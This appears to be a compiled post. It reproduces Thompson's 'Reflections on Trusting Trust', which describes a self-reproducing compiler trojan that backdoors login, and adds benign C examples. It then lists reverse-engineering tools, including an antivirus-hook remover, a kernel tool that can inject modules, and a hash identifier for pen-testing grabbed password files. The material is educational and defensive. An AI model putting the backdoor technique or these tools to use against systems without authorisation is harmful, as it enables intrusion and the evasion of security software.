That brings me to Dennis Ritchie. Our collaboration has been a thing of beauty. In the ten years that we have worked together, I can recall only one case of miscoordination of work. On that occasion, I discovered that we both had written the same 20-line assembly language program. I compared the sources and was astounded to find that they matched character-for-character. The result of our work together has been far greater than the work that we each contributed.

I am a programmer. On my 1040 form, that is what I put down as my occupation. As a programmer, I write programs. I would like to present to you the cutest program I ever wrote. I will do this in three stages and try to bring it together at the end.

Stage I

In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular.

More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about "shortest" was just an incentive to demonstrate skill and determine a winner.

FIGURE 1

Figure 1 shows a self-reproducing program in the C programming language. (The purist will note that the program is not precisely a self-reproducing program, but will produce a self-reproducing program.) This entry is much too large to win a prize, but it demonstrates the technique and has two important properties that I need to complete my story: (1) This program can be easily written by another program. (2) This program can contain an arbitrary amount of excess baggage that will be reproduced along with the main algorithm. In the example, even the comment is reproduced.

Stage II

The C compiler is written in C. What I am about to describe is one of many "chicken and egg" problems that arise when compilers are written in their own language. In this case, I will use a specific example from the C compiler.

C allows a string construct to specify an initialized character array. The individual characters in the string can be escaped to represent unprintable characters. For example, "Hello world\n" represents a string with the character "\n," representing the new line character.

FIGURE 2

Figure 2 is an idealization of the code in the C compiler that interprets the character escape sequence. This is an amazing piece of code. It "knows" in a completely portable way what character code is compiled for a new line in any character set. The act of knowing then allows it to recompile itself, thus perpetuating the knowledge.

FIGURE 3

Suppose we wish to alter the C compiler to include the sequence "\v" to represent the vertical tab character. The extension to Figure 2 is obvious and is presented in Figure 3. We then recompile the C compiler, but we get a diagnostic. Obviously, since the binary version of the compiler does not know about "\v," the source is not legal C. We must "train" the compiler. After it "knows" what "\v" means, then our new change will become legal C. We look up on an ASCII chart that a vertical tab is decimal 11. We alter our source to look like Figure 4. Now the old compiler accepts the new source. We install the resulting binary as the new official C compiler and now we can write the portable version the way we had it in Figure 3.

FIGURE 4

This is a deep concept. It is as close to a "learning" program as I have seen. You simply tell it once, then you can use this self-referencing definition.

Stage III

FIGURE 5

Again, in the C compiler, Figure 5 represents the high-level control of the C compiler where the routine "compile" is called to compile the next line of source. Figure 6 shows a simple modification to the compiler that will deliberately miscompile source whenever a particular pattern is matched. If this were not deliberate, it would be called a compiler "bug." Since it is deliberate, it should be called a "Trojan horse."

FIGURE 6

The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.

Such blatant code would not go undetected for long. Even the most casual perusal of the source of the C compiler would raise suspicions.

FIGURE 7

The final step is represented in Figure 7. This simply adds a second Trojan horse to the one that already exists. The second pattern is aimed at the C compiler. The replacement code is a Stage I self-reproducing program that inserts both Trojan horses into the compiler. This requires a learning phase as in the Stage II example. First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere.

Moral

The moral is obvious. You can't trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

After trying to convince you that I cannot be trusted, I wish to moralize. I would like to criticize the press in its handling of the "hackers," the 414 gang, the Dalton gang, etc. The acts performed by these kids are vandalism at best and probably trespass and theft at worst. It is only the inadequacy of the criminal code that saves the hackers from very serious prosecution. The companies that are vulnerable to this activity (and most large companies are very vulnerable) are pressing hard to update the criminal code. Unauthorized access to computer systems is already a serious crime in a few states and is currently being addressed in many more state legislatures as well as Congress.

There is an explosive situation brewing. On the one hand, the press, television, and movies make heroes of vandals by calling them whiz kids. On the other hand, the acts performed by these kids will soon be punishable by years in prison.

I have watched kids testifying before Congress. It is clear that they are completely unaware of the seriousness of their acts. There is obviously a cultural gap. The act of breaking into a computer system has to have the same social stigma as breaking into a neighbor's house. It should not matter that the neighbor's door is unlocked. The press must learn that misguided use of a computer is no more amazing than drunk driving of an automobile.

Acknowledgment

I first read of the possibility of such a Trojan horse in an Air Force critique (4) of the security of an early implementation of Multics. I cannot find a more specific reference to this document. I would appreciate it if anyone who can supply this reference would let me know.

References

1. Bobrow, D.G., Burchfiel, J.D., Murphy, D.L., and Tomlinson, R.S. TENEX, a paged time-sharing system for the PDP-10. Commun. ACM 15, 3 (Mar. 1972), 135-143.
2. Kernighan, B.W., and Ritchie, D.M. The C Programming Language. Prentice-Hall, Englewood Cliffs, N.J., 1978.
3. Ritchie, D.M., and Thompson, K. The UNIX time-sharing system. Commun. ACM 17, 7 (July 1974), 365-375.
4. Unknown Air Force Document.

Source: Reflections on Trusting Trust
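Thompson's Figures 2 through 4 are not reproduced in the post above. The following C is an added example, not the paper's code and not anything from the post: an idealized escape-sequence interpreter of the kind Stage II describes, in both the "trained" form (the vertical tab written as the literal 11, so that an old compiler that does not yet know "\v" can build it) and the portable form (written as '\v', legal only once a compiler built from the trained source is installed), plus a decoder that runs the interpreter over a whole string-literal body. The function names, the decoder and the agreement check are my own choices.

```c
/* Added example: an idealized C escape-sequence interpreter in the spirit of
 * Thompson's Stage II (Figures 2-4), with a decoder for whole string bodies.
 * Not the paper's own code; names and structure are this example's choices. */
#include <stddef.h>
#include <string.h>

/* "Trained" form (Figure 4): the compiler binary that builds this source need
 * not know "\v" yet, because the vertical tab is spelled as decimal 11. */
int escape_trained(int c)
{
    switch (c) {
    case 'n':  return '\n';
    case 't':  return '\t';
    case '\\': return '\\';
    case '\'': return '\'';
    case '"':  return '"';
    case 'v':  return 11;   /* looked up on an ASCII chart: the learning step */
    default:   return -1;   /* unknown escape: the compiler would emit a diagnostic */
    }
}

/* Portable form (Figure 3): only legal once a compiler built from the trained
 * source is installed, so that '\v' itself is understood. From then on the
 * knowledge "vertical tab is 11" lives in the binary, not in this source. */
int escape_portable(int c)
{
    switch (c) {
    case 'n':  return '\n';
    case 't':  return '\t';
    case '\\': return '\\';
    case '\'': return '\'';
    case '"':  return '"';
    case 'v':  return '\v';
    default:   return -1;
    }
}

/* Decode the body of a string literal (without surrounding quotes) into out,
 * using the given escape interpreter. Returns the number of bytes written, or
 * -1 on an unknown escape or a trailing backslash. out needs strlen(in)+1 bytes. */
long unescape(const char *in, char *out, int (*esc)(int))
{
    size_t n = 0;
    for (const char *p = in; *p; p++) {
        if (*p != '\\') { out[n++] = *p; continue; }
        p++;
        if (*p == '\0') return -1;              /* backslash at end of literal */
        int v = esc((unsigned char)*p);
        if (v < 0) return -1;                   /* diagnostic: not legal C */
        out[n++] = (char)v;
    }
    out[n] = '\0';
    return (long)n;
}

/* The trained and portable interpreters must agree on every escape letter:
 * that agreement is exactly the knowledge the bootstrap step perpetuates. */
int tables_agree(void)
{
    const char *letters = "ntv\\'\"";
    for (const char *p = letters; *p; p++)
        if (escape_trained((unsigned char)*p) != escape_portable((unsigned char)*p))
            return 0;
    return 1;
}
```

Once the portable version is the official compiler, nothing in the source records that a vertical tab is 11; that fact survives only in the installed binary, which is the same property the Stage III trojan relies on and the reason source review alone cannot rule it out.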
  20. SysAnalyzer

Author: David Zimmer (iDefense Labs)
Website: RE Corner
Current version:
Last updated: March 21, 2011
Direct D/L link: http://sandsprite.com/CodeStuff/SysAnalyzer_Setup.exe

Update: This tool is no longer available for download through the iDefense website. An updated installer has been made available by the author.

SysAnalyzer is an automated malcode run time analysis application that monitors various aspects of system and process states. SysAnalyzer was designed to enable analysts to quickly build a comprehensive report as to the actions a binary takes on a system.

SysAnalyzer can automatically monitor and compare:
* Running Processes
* Open Ports
* Loaded Drivers
* Injected Libraries
* Key Registry Changes
* APIs called by a target process
* File Modifications
* HTTP, IRC, and DNS traffic

SysAnalyzer also comes with a ProcessAnalyzer tool which can perform the following tasks:
* Create a memory dump of target process
* parse memory dump for strings
* parse strings output for exe, reg, and url references
* scan memory dump for known exploit signatures

Full GPL source for SysAnalyzer is included in the installation package.

Download: http://sandsprite.com/CodeStuff/SysAnalyzer_Setup.exe

Source: Category:Registry Monitoring Tools - Collaborative RCE Tool Library
  21. Burp Suite

Author: PortSwigger
Website: http://www.portswigger.net/suite/
Current version: 1.1
Last updated:
Direct D/L link: http://portswigger.net/suite/download.html

Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, authentication, downstream proxies, logging, alerting and extensibility.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Key features unique to Burp Suite include:
* Ability to "passively" spider an application in a non-intrusive manner, with all requests originating from the user's browser.
* One-click transfer of interesting requests between tools, e.g. from the Burp Proxy request history, or the Burp Spider results tree.
* Detailed analysis and rendering of requests and responses.
* Extensibility via the IBurpExtender interface, which allows third-party code to extend the functionality of Burp Suite. Data processed by one tool can be used in arbitrary ways to affect the behaviour and results of other tools.
* Centrally configured settings for downstream proxies, web and proxy authentication, and logging.
* Tools can run in a single tabbed window, or be detached in individual windows.
* All tool and suite configuration is optionally persistent across program loads.
* Runs in both Linux and Windows.

New features in version 1.1 include:
* Improved analysis of HTTP requests and responses wherever they appear, with browser-quality HTML and media rendering.
* Burp Sequencer, a new tool for analysing session token randomness.
* Burp Decoder, a new tool for performing manual and intelligent decoding and encoding of application data.
* Burp Comparer, a new utility for performing a visual diff of any two data items.
* Support for custom client and server SSL certificates.
* Ability to follow 3xx redirects in Burp Intruder and Repeater attacks.
* Improved interception and match-and-replace rules in Burp Proxy.
* A "lean mode", for users who prefer less functionality and a smaller resource footprint.

Burp Suite is a Java application, and runs on any platform for which a Java Runtime Environment is available. It requires version 1.5 or later. The JRE can be obtained for free from java.sun.com.

Download: http://www.portswigger.net/burp/downloadfree.html

Source: Download Burp Suite
  22. SDT Cleaner

Author: Nahuel C. Riva
Website: Corelabs site
Current version: 1.0
Last updated:
Direct D/L link: Locally archived copy

SDT Cleaner is a tool that intends to clean the SSDT (system service descriptor table) from hooks.
* SDT Cleaner allows you to clean hooks installed by Anti-Virus and Firewalls.
* This little tool (in this first release) tries to collect info from your current kernel and then switches to kernel land; if there are any hooks in the SSDT, this tool will replace them with the original entries.

Download: http://corelabs.coresecurity.com/index.php?module=Wiki&action=attachment&type=tool&page=SDT_Cleaner&file=SDTCleaner-v1.0.zip

Source: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  23. Kernel Detective

Author: GamingMaster -AT4RE
Website: http://www.at4re.com
Current version: 1.4.1
Last updated: December 10, 2010
Direct D/L link: Locally archived copy

Kernel Detective is a free tool that helps you detect, analyze, manually modify and fix some Windows NT kernel modifications. Kernel Detective gives you access to the kernel directly, so it is not oriented towards newbies. Changing essential kernel-mode objects without enough knowledge will lead you to only one result ... BSoD!

Supported NT versions: XP/Vista/Server 2008/SEVEN

Kernel Detective gives you the ability to:
1- Detect Hidden Processes.
2- Detect Hidden Threads.
3- Detect Hidden DLLs.
4- Detect Hidden Handles.
5- Detect Hidden Drivers.
6- Detect Hooked SSDT.
7- Detect Hooked Shadow SSDT.
8- Detect Hooked IDT.
9- Detect Kernel-mode code modifications and hooks.
10- Disassemble (Read/Write) Kernel-mode/User-mode memory.
11- Monitor debug output on your system.

Enumerate running processes and print important values like Process Id, Parent Process Id, ImageBase, EntryPoint, VirtualSize, PEB block address and EPROCESS block address. Special undocumented detection algorithms were implemented to detect hidden processes.

Detect hidden and suspicious threads in the system and allow the user to forcibly terminate them.

Enumerate a specific running process's Dynamic-Link Libraries and show every DLL's ImageBase, EntryPoint, Size and Path. You can also inject or free a specific module.

Enumerate a specific running process's opened handles, show every handle's object name and address, and give you the ability to close the handle.

Enumerate loaded kernel-mode drivers and show every driver's ImageBase, EntryPoint, Size, Name and Path. Undocumented detection algorithms were implemented to detect hidden drivers.

Scan the system service table (SSDT) and show every service function address and the real function address; the detection algorithm was improved to bypass KeServiceDescriptorTable EAT/IAT hooks. You can restore a single service function address or restore the whole table.

Scan the shadow system service table (Shadow SSDT) and show every shadow service function address and the real function address. You can restore a single shadow service function address or restore the whole table.

Scan the interrupts table (IDT) and show every interrupt handler offset, selector, type, attributes and real handler offset. This is applied to every processor in a multi-processor machine.

Scan the important system kernel modules, detect the modifications in their body and analyze them. For now it can detect and restore inline code modifications, EAT and IAT hooks. I'm looking at other types of hooks for the next releases of Kernel Detective.

A nice disassembler relying on the OllyDbg disasm engine (thanks to Oleh Yuschuk for publishing his nice disasm engine). With it you can disassemble, assemble and hex edit the virtual memory of a specific process or even the kernel space memory. Kernel Detective uses its own Read/Write routines from kernel-mode and doesn't rely on any Windows API. That makes Kernel Detective able to R/W a process's VM even if NtReadProcessMemory/NtWriteProcessMemory is hooked, and also bypasses the hooks on other important kernel-mode routines like KeStackAttachProcess and KeAttachProcess.

Show the messages sent by drivers to the kernel debugger, just like Dbgview by Mark Russinovich. It does this by hooking interrupt 0x2d, which is responsible for outputting debug messages. Hooking interrupts may cause problems on some machines, so DebugView is turned off by default; to turn it on you must run Kernel Detective with the "-debugv" parameter.

Download: http://www.woodmann.com/collaborative/tools/images/Bin_Kernel_Detective_2010-12-10_17.28_Kernel_Detective_v1.4.1.rar

Source: Category:Kernel Hook Detection Tools - Collaborative RCE Tool Library
  24. Codetective Analysis Tool

Author: Francisco Gama Tabanez Ribeiro
Website: http://www.digitalloft.org
Current version: 0.7
Last updated: March 26, 2012
Direct D/L link: Locally archived copy

Sometimes we run into hashes and other codes and can't figure out where they came from and how they were built. If you work on pen-testing, that might easily happen when you are testing systems from a black-box perspective and you are able to grab a password file with hashed contents, maybe from an exposed backup file or by dumping memory. This may also be useful as part of a fingerprinting process. You can either use a generic version or a plugin for the Volatility framework; the usage is similar.

Currently supports: shadow and SAM files, phpBB3, Wordpress, Joomla, CRC, LM, NTLM, MD4, MD5, Apr, SHA1, SHA256, base64, MySQL323, MYSQL4+, MSSQL2000, MSSQL2005, DES, RipeMD320, Whirlpool, SHA1, SHA224, SHA256, SHA384, SHA512, Blowfish, UUID

Download: http://www.woodmann.com/collaborative/tools/images/Bin_Codetective_Analysis_Tool_2012-4-13_15.31_codetective.zip

Source: Category:Crypto Tools - Collaborative RCE Tool Library
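The identification Codetective performs is shape-based: a digest or crypt string is classified by its prefix, its length and its character set. The C below is an added example of that approach, written for this post and not Codetective's code; the function name, the returned labels and the sample values in the comments are my own constructions. It covers the formats the list above names, and the ambiguity it cannot resolve (a 32-digit hex string is equally MD5, MD4, NTLM or LM) is the caveat to keep in mind when reading any tool's verdict.

```c
/* Added example: shape-based hash/encoding identification of the kind
 * Codetective does. Not Codetective's code; labels and thresholds are mine. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

static int all_hex(const char *s, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!isxdigit((unsigned char)s[i])) return 0;
    return 1;
}

static int all_in(const char *s, size_t n, const char *allowed)
{
    for (size_t i = 0; i < n; i++)
        if (s[i] == '\0' || !strchr(allowed, s[i])) return 0;
    return 1;
}

/* Classify s by prefix, length and alphabet. Returns a static label string. */
const char *identify_hash(const char *s)
{
    static const char B64[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    static const char CRYPT64[] =
        "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    /* Modular-crypt prefixes as seen in shadow, htpasswd and PHP apps. */
    static const struct { const char *prefix; const char *name; } prefixes[] = {
        { "$apr1$", "Apache APR1 MD5-crypt (htpasswd)" },
        { "$1$",    "MD5-crypt (shadow)" },
        { "$2a$",   "bcrypt / Blowfish-crypt" },
        { "$2b$",   "bcrypt / Blowfish-crypt" },
        { "$2y$",   "bcrypt / Blowfish-crypt" },
        { "$5$",    "SHA-256-crypt (shadow)" },
        { "$6$",    "SHA-512-crypt (shadow)" },
        { "$P$",    "phpass portable hash (WordPress / phpBB3)" },
        { "$H$",    "phpass portable hash (WordPress / phpBB3)" },
    };
    size_t n = strlen(s);

    for (size_t i = 0; i < sizeof prefixes / sizeof prefixes[0]; i++)
        if (strncmp(s, prefixes[i].prefix, strlen(prefixes[i].prefix)) == 0)
            return prefixes[i].name;

    /* Database formats with a fixed marker. */
    if (n == 41 && s[0] == '*' && all_hex(s + 1, 40))
        return "MySQL 4.1+ (SHA-1 based)";
    if (n == 94 && strncmp(s, "0x0100", 6) == 0 && all_hex(s + 6, 88))
        return "MSSQL 2000 (salted SHA-1, two hashes)";
    if (n == 54 && strncmp(s, "0x0100", 6) == 0 && all_hex(s + 6, 48))
        return "MSSQL 2005 (salted SHA-1)";
    /* Joomla stores md5(password+salt) as "<32 hex>:<32-char salt>". */
    if (n == 65 && s[32] == ':' && all_hex(s, 32))
        return "Joomla (MD5:salt)";
    if (n == 36 && s[8] == '-' && s[13] == '-' && s[18] == '-' && s[23] == '-'
        && all_hex(s, 8) && all_hex(s + 9, 4) && all_hex(s + 14, 4)
        && all_hex(s + 19, 4) && all_hex(s + 24, 12))
        return "UUID";
    if (n == 13 && all_in(s, 13, CRYPT64))
        return "traditional DES-crypt (13 chars)";

    /* Plain hex digests: only the length distinguishes them, and several
     * algorithms share a length, so the label lists every candidate. */
    if (n > 0 && all_hex(s, n)) {
        switch (n) {
        case 8:   return "CRC32 (8 hex digits)";
        case 16:  return "MySQL323 (16 hex digits)";
        case 32:  return "MD5 / MD4 / NTLM / LM (32 hex digits)";
        case 40:  return "SHA-1 (40 hex digits)";
        case 56:  return "SHA-224 (56 hex digits)";
        case 64:  return "SHA-256 (64 hex digits)";
        case 80:  return "RIPEMD-320 (80 hex digits)";
        case 96:  return "SHA-384 (96 hex digits)";
        case 128: return "SHA-512 / Whirlpool (128 hex digits)";
        default:  break;
        }
    }
    /* Last resort: base64 alphabet and a multiple-of-4 length. A short hex
     * string also passes this test, which is why it is checked last. */
    if (n >= 4 && n % 4 == 0 && all_in(s, n, B64))
        return "base64 (decode and re-check)";
    return "unknown";
}
```

A shape match is a hint, not a proof: the same 32 hex digits can come from four different algorithms, and a base64 verdict only tells you to decode and classify again. Where the originating file is known (shadow, SAM, a web application's user table), that context settles the question more reliably than the string alone.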
  25. [h=3]Visual DuxDebugger[/h]Visual DuxDebugger is a 64-bit debugger/disassembler for Windows, especially useful when source code is unavailable. The user interface is very intuitive, so it makes any reverse-engineering task very simple: you can edit code, registers, and memory. Visual DuxDebugger provides wide information about the process being debugged, showing all loaded modules with all exported functions, call stack, threads and much more. The main difference from other debuggers is that Visual DuxDebugger can debug child processes and multiple processes.

Software Reverse Engineering is commonly used:
· As a learning tool to understand undocumented APIs.
· As a way to make new compatible products.
· For making software interoperate more effectively.
· To bridge different operating systems or databases.
· To analyze possible spyware / malware.
· To uncover and exploit vulnerabilities.
· To audit software.
· To fix complex bugs.
· For litigation support.

Download: http://www.duxcore.com/index.php/prod/visual-duxdebugger/overview